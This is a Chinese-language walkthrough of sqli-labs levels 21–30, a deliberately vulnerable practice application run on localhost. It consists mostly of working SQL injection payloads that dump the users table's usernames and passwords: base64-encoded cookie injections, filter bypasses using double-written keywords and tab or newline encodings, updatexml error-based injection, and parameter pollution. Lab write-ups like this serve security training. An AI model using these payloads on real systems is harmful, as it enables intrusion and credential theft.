Less-21
1、输入admin 123456 登录,然后用burpsuite抓包
2、将数据包发送至repeater,在Cookie后输入'报错,判断闭合方式为 ') #
对所写代码进行如下操作:选中右击->Convert selection->Base64->Base64-encode
3、判断列数
') order by 4 # => Jykgb3JkZXIgYnkgNCAj
') order by 3 # => Jykgb3JkZXIgYnkgMyAj
4、查询回显点
') union select 1,2,3 # => JykgdW5pb24gc2VsZWN0IDEsMiwzICM=
5、查询数据库名
') union select 1,2,database() # => JykgdW5pb24gc2VsZWN0IDEsMixkYXRhYmFzZSgpICM=
6、查表名
') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' # => JykgdW5pb24gc2VsZWN0IDEsZ3JvdXBfY29uY2F0KHRhYmxlX25hbWUpLDMgZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEudGFibGVzIHdoZXJlIHRhYmxlX3NjaGVtYT0nc2VjdXJpdHknICM=
7、查users表中的列名
') union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' # =>
JykgdW5pb24gc2VsZWN0IDEsZ3JvdXBfY29uY2F0KGNvbHVtbl9uYW1lKSwzIGZyb20gaW5mb3JtYXRpb25fc2NoZW1hLmNvbHVtbnMgd2hlcmUgdGFibGVfc2NoZW1hPSdzZWN1cml0eScgYW5kIHRhYmxlX25hbWU9J3VzZXJzJyAj
8、查询表中所有数据
') union select 1,2,group_concat(id,username,password) from users # =>
JykgdW5pb24gc2VsZWN0IDEsMixncm91cF9jb25jYXQoaWQsdXNlcm5hbWUscGFzc3dvcmQpIGZyb20gdXNlcnMgIw==
Less-22
1、输入admin 123456 登录,使用burpsuite抓包
2、在Cookie后输入'报错,判断闭合方式为" #
对所写代码进行如下操作:选中右击->Convert selection->Base64->Base64-encode
3、判断列数
" order by 4 # => IiBvcmRlciBieSA0ICM=
" order by 3 # => IiBvcmRlciBieSAzICM=
4、查询回显点
" union select 1,2,3 # => IiB1bmlvbiBzZWxlY3QgMSwyLDMgIw==
5、查询数据库
" union select 1,2,database() # => IiB1bmlvbiBzZWxlY3QgMSwyLGRhdGFiYXNlKCkgIw==
6、查表名
" union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' # =>
IiB1bmlvbiBzZWxlY3QgMSxncm91cF9jb25jYXQodGFibGVfbmFtZSksMyBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS50YWJsZXMgd2hlcmUgdGFibGVfc2NoZW1hPSdzZWN1cml0eScgIw==
7、查列名
代码:" union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' # =>
IiB1bmlvbiBzZWxlY3QgMSxncm91cF9jb25jYXQoY29sdW1uX25hbWUpLDMgZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEuY29sdW1ucyB3aGVyZSB0YWJsZV9zY2hlbWE9J3NlY3VyaXR5JyBhbmQgdGFibGVfbmFtZT0ndXNlcnMnICM=
8、查询表中所有数据
" union select 1,2,group_concat(id,username,password) from users # =>
IiB1bmlvbiBzZWxlY3QgMSwyLGdyb3VwX2NvbmNhdChpZCx1c2VybmFtZSxwYXNzd29yZCkgZnJvbSB1c2VycyAj
Less-23
1、用?id=1 --+有数据
用?id=1 #有数据
发现--+和#过滤
2、判断闭合方式:?id=1' and ' 1 ' =' 1
3、查询回显参数
http://127.0.0.1/less-23/?id=-1%27%20union%20select%201,2,3%20and%20%27%201%20%27%20=%27%201
4、查询数据库
5、查表名
http://127.0.0.1/less-23/?id=-1%27%20union%20select%201,group_concat(table_name),3%20from%20information_schema.tables%20where%20table_schema=%27security%27%20and%20%27%201%20%27%20=%27%201
6、查列名
http://127.0.0.1/less-23/?id=-1%27%20union%20select%201,group_concat(column_name),3%20from%20information_schema.columns%20where%20table_schema=%27security%27%20and%20table_name=%27users%27%20and%20%27%201%20%27%20=%27%201
Less-24
1、注册新用户
2、登录->修改密码
修改成功
Less-25
1、界面显示 or 和 and 被过滤
利用联合查询闭合方式为id=1' --+
2、查回显参数
http://127.0.0.1/less-25/?id=-1%27%20union%20select%201,2,3%20--+
3、查询数据库
http://127.0.0.1/less-25/?id=-1%27%20union%20select%201,database(),3%20--+
4、查表名
http://127.0.0.1/less-25/?id=-1%27%20union%20select%201,group_concat(table_name),3%20from%20infoorrmation_schema.tables%20where%20table_schema=%27security%27%20--+
5、查列名
http://127.0.0.1/less-25/?id=-1%27%20union%20select%201,group_concat(column_name),3%20from%20infoorrmation_schema.columns%20where%20table_schema=%27security%27%20anandd%20table_name=%27users%27%20--+
6、查所有数据
Less-26
1、判断闭合方式、
在使用1' and' 闭合时,发现注释符以及空格被过滤了,使用双写或&&和||替换 空格用括号替换
2、查看数据库名
?id=1'||(updatexml(1,concat(1,(select(database()))),1))||'
3、查看数据库表名
?id=1'||(updatexml(1,concat(1,(select(group_concat(table_name)) from (infoorrmation_schema.tables)where(table_schema='security'))),1))||'
4、查看users表中的列名
?id=1'||(updatexml(1,concat(1,(select(group_concat(column_name))from(infoorrmation_schema.columns)where(table_schema='security'aandnd(table_name='users')))),1))||'
5、查看users表内所有内容
?id=1'||(updatexml(1,concat(1,(select(group_concat(passwoorrd,username))from(users))),1))||'
Less-27
1、本关过滤了空格,union 以及select,可以尝试大小写绕过,空格可以用%09替换
2、查询数据库名
?id=1'and%09updatexml(1,concat(1,(sElect%09database())),1)and'
3、查询数据库中的表
?id=1'and%09updatexml(1,concat(1,(sElect%09group_concat(table_name)%09from%09information_schema.tables%09where%09table_schema='security')),1)and'
4、查询users表中的列
?id=1'and%09updatexml(1,concat(1,(sElect%09group_concat(column_name)%09from%09information_schema.columns%09where%09table_schema='security'%09and%09table_name='users')),1)and'
5、查询users表中所有字段
?id=1'and%09updatexml(1,concat(1,(sElect%09group_concat(username,password)%09from%09users)),1)and'
Less-28
1、本关过滤了空格,union和select,空格用%0A替换,union select使用双写替换
2、查看表名
?id=99')uniunion%0Aselecton%0Aselect%0A1,2,group_concat(table_name)from%0Ainformation_schema.tables%0Awhere%0Atable_schema='security'and ('1
3、查询users表中列名
?id=99')uniunion%0Aselecton%0Aselect%0A1,2,group_concat(column_name)from%0Ainformation_schema.columns%0Awhere%0Atable_schema='security'%0Aand%0Atable_name='users'%0Aand('1
Less-29
1、对输入的参数进行校验是否为数字,但是在对参数值进行校验之前的提取时候只提取了第一个id值,如果我们有两个id参数,第一个id参数正常数字,第二个id参数进行sql注入
2、查询数据库名
?id=1&id=-1'union select 1,database(),3 --+
3、查询数据库中的表名
?id=1&id=-1'union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+
4、查看users表中列名
?id=1&id=-1'union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' --+
5、查看users表中所有字段
?id=1&id=-1'union select 1,2,group_concat(id,username,password) from users --+
Less-30
1、 对输入的参数进行校验是否为数字,但是在对参数值进行校验之前的提取时候只提取了第一个id值,如果我们有两个id参数,第一个id参数正常数字,第二个id参数进行sql注入
2、查询数据库名
?id=1&id=-1"union select 1,database(),3 --+
3、查询数据库中的表名
?id=1&id=-1"union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+
4、查询users表中的列
?id=1&id=-1"union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' --+
5、查询users表中所有字段
?id=1&id=-1"union select 1,2,group_concat(id,username,password) from users --+